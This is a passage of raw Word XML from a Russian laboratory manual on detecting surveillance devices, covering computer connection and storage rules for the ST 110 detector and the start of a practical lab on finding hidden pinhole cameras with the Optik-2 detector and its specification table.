            <w:tcW w:w="1032"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blPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="509" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>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t>Уст. коррекции</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>установка ежедневной коррекции хода часов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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t>от -2 мин до +2 мин с дискретностью одна секунда в сутки</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B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>00:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0245">
        <w:tab/>
        <w:t>РАБОТА С КОМПЬЮТЕРОМ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>Для начала работы установите программное обеспечение с прилагаемого мини CD диска или с Интернет сайта производителя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>Подключите основной блок к компьютеру с помощью прилагаемого USB кабеля. После запроса на установку драйвера укажите путь загрузки. При запросе на подтверждение установки ОБЯЗАТЕЛЬНО разрешите установку. Если компьютер подключен к интернету, то загрузка необходимого драйвера может произойти автоматически.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>7.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0245">
        <w:tab/>
        <w:t>ПРОГРАММА «ST 110 ANALYZER»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>Данная программа предназначена для:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0245">
        <w:tab/>
        <w:t xml:space="preserve"> отображения в графическом виде результата работы ST 1 1 0 в режиме реального времени;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t xml:space="preserve"> —</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0245">
        <w:tab/>
        <w:t xml:space="preserve"> полного управления ST 1 1 0 с ПК;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0245">
        <w:tab/>
        <w:t xml:space="preserve"> задания расширенных предустановок для режима «МОНИТОРИНГ»;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD0245">
        <w:t>загрузки и отображения, как в графическом, так и в текстовом формате результата работы ST 11 О в режиме «МОНИТОРИНГ» (протокол событий);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0245">
        <w:tab/>
        <w:t xml:space="preserve"> полное описание работы с программой находится на мини CD и в самой программе в меню «Справка».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>7.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0245">
        <w:tab/>
        <w:t>ОБНОВЛЕНИЕ ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ ПРИБОРА ЧЕРЕЗ ИНТЕРНЕТ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>Выберите нужную версию обновления на сайте производителя. При нажатии на выбранную ссылку появится запрос «Запустить программу с текущей позиции» или «Сохранить эту программу на диск». Выберите первую строку запроса. При этом программа в течение нескольких секунд будет загружена и запущена.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>Подсоедините кабель к свободному USB порту. На ST 1 1 0 нажмите на кнопку | M^wu | и удерживая ее кнопку |ишмире|. На дисплее ST 1 1 0 должна появиться надпись «ST 1 1 0 - &gt; РС».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>Проконтролируйте процесс загрузки на экране компьютера. Если по каким-либо причинам операция завершилась неудачно, компьютерная программа предложит повторить попытку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>При необходимости, программу из Интернет можно просто загрузить на любой носитель и использовать на любом другом Windows совместимом компьютере.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>8.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0245">
        <w:tab/>
        <w:t>НЕКОТОРЫЕ ОГРАНИЧЕНИЯ И РЕКОМЕНДАЦИИ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>8.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0245">
        <w:tab/>
        <w:t>Транспортировать и хранить комплект ST 1 1 0 необходимо в стандартной упаковке.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>Для длительного хранения прибора использовать закрытые, отапливаемые помещения с температурой воздуха от 1 0 до 35°С и влажностью не более 80%.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>При транспортировке принять меры к исключению воздействия на стандартную упаковку ударных или нажимных нагрузок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>8.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0245">
        <w:tab/>
        <w:t xml:space="preserve"> После длительного (более 4-х часов) нахождения прибора при температуре ниже -5°С включать его в работу только при очевидном отсутствии следов отпотевания и высыхании конденсата.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>8.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0245">
        <w:tab/>
        <w:t xml:space="preserve"> В ходе работ стараться исключить попадание на поверхность ST 1 1 0 концентрированной влаги (дождя, мороси, снега).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00DD0245">
        <w:t>8.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0245">
        <w:tab/>
        <w:t xml:space="preserve"> Не допускать долговременного воздействия на жидкокристаллический дисплей прямых солнечных лучей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Задания для выполнения лабораторной работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t xml:space="preserve">Во время работы с прибором  необходимо обнаружить и отразить в отчете </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C73">
        <w:t>IP-камера для помещений Link 128;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C73">
        <w:t>Видеоглазок беспроводной  Radio DVR;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C73">
        <w:t>Видеорегистратор LawMate PV-550SE с камерой 618СА.</w:t>
      </w:r>
      <w:r>
        <w:t>(П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc508029576"/>
      <w:bookmarkStart w:id="27" w:name="_Toc3808616"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve"> работа №</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:t>. Поиск и локализация скрытых видеокамер с использованием обнаружителя скрытых видеокамер «Оптик-2».</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Цель работы: научится применять обнаружитель видеокамер для поиска и локализация скрытых видеокамер</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Назначение прибора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Профессиональный обнаружитель скрытых видеокамер «Оптик-2» предназначен для  поиска и локализация скрытых (камуфлированных в интерьер) видеокамер типа «пинхол» независимо от их состояния (включено/выключено) и типа передачи видеосигнала.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Технические характеристики</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Поиск объектива видеокамеры методом световой локации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     При обнаружении объектива скрытой камеры в объективе прибора «Оптик-2» будет наблюдаться точечное пятно зелёного или красного цвета – результат отражения подсветки от видеокамеры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB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4A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="673"/>
        <w:gridCol w:w="5931"/>
        <w:gridCol w:w="2718"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="652"/>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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:pPr>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB40F5">
              <w:t>п/п</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Параметр</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Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="521"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="717" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00BB40F5">
              <w:t>1.</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xml:space="preserve">Дальность обнаружения:  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00BB40F5">
              <w:t>(зависит от световой обстановки (освещённости помещения))</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 xml:space="preserve">от 0,5 до </w:t>
            </w:r>
            <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="metricconverter">
              <w:smartTagPr>
                <w:attr w:name="ProductID" w:val="50 метров"/>
              </w:smartTagPr>
              <w:r w:rsidRPr="00BB40F5">
                <w:t>50 метров</w:t>
              </w:r>
            </w:smartTag>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="36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2.</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Угол обзора:</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7,5 градусов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="36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3.</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Кратность</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6,5х</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="36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4.</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Диапазон фокусировки:</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от 0,5 метра до ∞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="36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5.</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Режим работы:</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xml:space="preserve">- непрерывный зелёный </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00BB40F5">
              <w:t xml:space="preserve">- непрерывный красный </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00BB40F5">
              <w:t>- импульсный зелёный</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00BB40F5">
              <w:t>- импульсный красный</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00BB40F5">
              <w:t>- импульсный красно-зелёный</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="329"/>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6.</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xml:space="preserve">Тип питания: </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rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Li</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB40F5">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB40F5">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>ion</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB40F5">
              <w:t xml:space="preserve"> аккумулятор 3,7 В</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="18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7.</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xml:space="preserve">Вид подсветки: </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светодиодная</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="18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8.</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Количество светодиодов</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22 шт.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="36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9.</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Цвет подсветки</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зелёная, красная,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:pPr>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB40F5">
              <w:t>красно/зелёная</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="333"/>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10.</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Масса прибора (грамм)</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450 гр.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="342"/>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11.</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xml:space="preserve">Масса прибора в транспортной сумке, с зарядным устройством </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800 гр.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="18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12.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6483" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00BB40F5">
              <w:t>Время работы (при полностью заряженном аккумуляторе)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>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в импульсном режиме при работе красно/зелёной подсветки: не менее 4-х часов</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00BB40F5">
              <w:t>- в непрерывном режиме: не менее 6-ти часов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10077" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Комплектация</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="131"/>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Обнаружитель «Оптик-2»</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r w:rsidRPr="00BB40F5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
